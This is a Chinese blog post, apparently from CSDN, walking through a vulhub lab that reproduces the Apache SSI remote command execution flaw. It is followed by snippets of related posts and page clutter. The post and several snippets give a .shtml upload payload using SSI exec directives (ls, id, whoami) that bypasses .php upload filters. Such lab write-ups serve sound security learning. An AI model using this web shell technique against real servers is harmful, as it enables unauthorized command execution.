Apache SSI 远程命令执行漏洞复现

已于 2023-03-21 20:34:55 修改
阅读量110 收藏
点赞数
文章标签: apache 安全 服务器 Powered by 金山文档
于 2023-02-19 11:13:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53623841/article/details/129108371
版权

在vulhub文件夹下打开终端

到此目录下

启动:docker-compose up -d

查看ubuntu的ip

访问http://ubuntu的ip:8080/upload.php

上传shell.shtml

内容为:<!--#exec cmd=”ls” -->

访问成功

梦晓呦
关注
apache SSI远程命令执行漏洞
afei001
01-15 240
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 Vulnhub搭建漏洞环境 4.2 apache SSI远程命令执行漏洞利用 5.漏洞修复 1.漏洞概述 SSI(Server Side Includes),即服务端包含。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 通过SSI注入漏洞执行系统命令,并返回对应的结果...
Apache SSI远程命令执行漏洞复现
qq_42754807的博客
06-01 260
apache ssi远程命令执行漏洞复现
【WEB攻防】Apache SSI 远程命令执行漏洞 复现和防御方法
AAAAAAAAAAAA66的博客
12-23 911
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 中华人民共和国网络安全
Apache SSI 远程命令执行漏洞复现实验报告
weixin_48400575的博客
02-26 4228
Apache SSI 远程命令执行漏洞复现实验报告
漏洞复现-Apache SSI 远程命令执行漏洞
网安小白的博客
02-20 261
Apache SSI 远程命令执行漏洞复现
apache ssi 远程命令执行漏洞复现
老北京砸酱锤的博客
06-22 142
在测试任意文件上传时,如果目标服务器对.php文件进行了过滤,但是开启了ssi和cgi的支持,则可上传一个.shtml文件,利用<!--#exec cmd="id" -->语法执行任意命令。 其中id可以任意改变。 进入漏洞环境->拉取环境->访问localhost:8080/upload.php 上传写好的.shtml文件内容为: <!--#exec cmd="whoami" --> <!--#exec cmd=”ls” --> <!-
复现Apache SSI 远程命令执行漏洞
qq_62673514的博客
02-19 178
复现Apache SSI 远程命令执行漏洞
漏洞复现Apache SSI 远程命令执行漏洞
qq_53409748的博客
02-19 163
SSI 注入全称Server-Side Includes Injection,即服务端包含注入。目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。在SSI中,默认扩展名是 .stm、.shtm 和 .shtml。如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用语法执行任意命令
Linux-Apache静态资源
DC_BLOG的博客
11-20 748
Linux-Apache中静态资源的配置以及后面对于静态界面的访问权限控制
apache中的Worker 和 Prefork 之间的区别是什么?
十一、的博客
11-20 561
Apache中的Worker和Prefork两种工作模式在内存使用、稳定性以及兼容性等方面存在区别。
兼顾高性能与低成本,浅析 Apache Doris 异步物化视图原理及典型场景
SelectDB
11-20 1066
同步物化视图的使用可参考。
如何进行Apache的配置与调试?
2401_83911225的博客
11-21 681
上海腾科教育致力于为广大学员提供全面且专业的认证指导服务,涵盖多个领域,通过精准的备考策略和高质量的模拟测试,确保每位学员都能够高效备考,轻松应对各类专业认证考试。1. 模块化:很多功能都不是由apache本身来完成的,而是由apache自身携带的模块和其扩展模块来完成的,因此一个完整的Apache的web服务= 自身的模块 + 扩展模块(因此将扩展模块又称为第三方模块)场景:早期一些依赖apache较老的模块(比如CGI的脚本),还有低频的安全访问场景(智能终端设备的web管理系统,像光猫、路由器)
大数据调度组件之Apache DolphinScheduler
Apache DolphinScheduler开源社区
11-20 867
Apache DolphinScheduler 是一个分布式易扩展的可视化 DAG 工作流任务调度系统。致力于解决数据处理流程中错综复杂的依赖关系,使调度系统在数据处理流程中开箱即用。
深入探索Apache JMeter:HashTree结构解析与应用
欢迎来到软件测试jeffky博客!在这里,我们将探讨各种与软件测试相关的主题,包括测试策略、方法、工具、最佳实践和行业趋势。我们的目标是帮助读者提高软件质量,确保用户满意度,并分享在软件测试领域的知识和经验。
11-21 463
定义:HashTree是JMeter中用于存储和管理测试计划元素的一种树状数据结构。它基于LinkedHashMap实现,提供了一种层次化的方式来表示测试计划的各个组件[1][2作用:HashTree的主要作用是组织和管理测试计划中的各个子元素,使得测试计划的构建和配置更加直观和易于管理。它不仅存储了节点之间的层次关系,还存储了节点之间的关联关系,从而方便地查找和获取节点之间的关联关系[1][2。
Apache Paimon】-- 6 -- 清理过期数据
欢迎来到我的博客,一起探索代码里的世界!
11-20 259
清理 paimon (表)过期数据可以释放存储空间,优化资源利用并提升系统运行效率等。
失落的Apache JDBM(Java Database Management)
★【World Of Moshow 郑锴】★
11-20 991
Apache JDBM(Java Database Management)是一个轻量级的、基于 Java 的嵌入式数据库管理系统。它主要用于在 Java 应用程序中存储和管理数据。这个项目已经过时了,只是发表一下以示纪念,现在已经大多数被SQLite和Derby代替。
如何给 Apache 新站点目录配置 SELinux ?
xiaochong0302的博客
11-22 668
SELinux 是保护 Linux 服务器最有效的工具之一,它是一种强制访问控制安全机制。当使用最流行的 web 服务器 Apache 提供 web 内容时,正确配置 SELinux 对安全性和功能都至关重要。
Apache paimon】-- 7 -- tag 创建与管理
最新发布
欢迎来到我的博客,一起探索代码里的世界!
11-22 172
apache paimon 的快照提供了一种非常容易访问历史数据的方法,但 flink job 会生成太多快照。我们通过 tag 策略可以保留重要的快照,删除不重要的 snapshot。创建 tag 的快照,在进入过期清除流程时,快照的元数据与数据文件仍会被持续保存。当快照过期后,利用 tag 仍能追溯查询到特定时间点的数据。在实践中,我们通常每日生成一个 tag ,能够确保对每一天历史数据的持久访问能力,为数据分析、审计和追溯等应用场景提供了支撑。
Apache SSI教程:实战与配置详解
安装后,用户可以根据官方文档自定义配置,但教程主要关注如何在Apache的配置文件(如`httpd.conf`)中添加必要的指令来支持SSI,如添加`AddType`、`Options`和`AddOutputFilter`等,以便处理`.ssi`类型的HTML文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值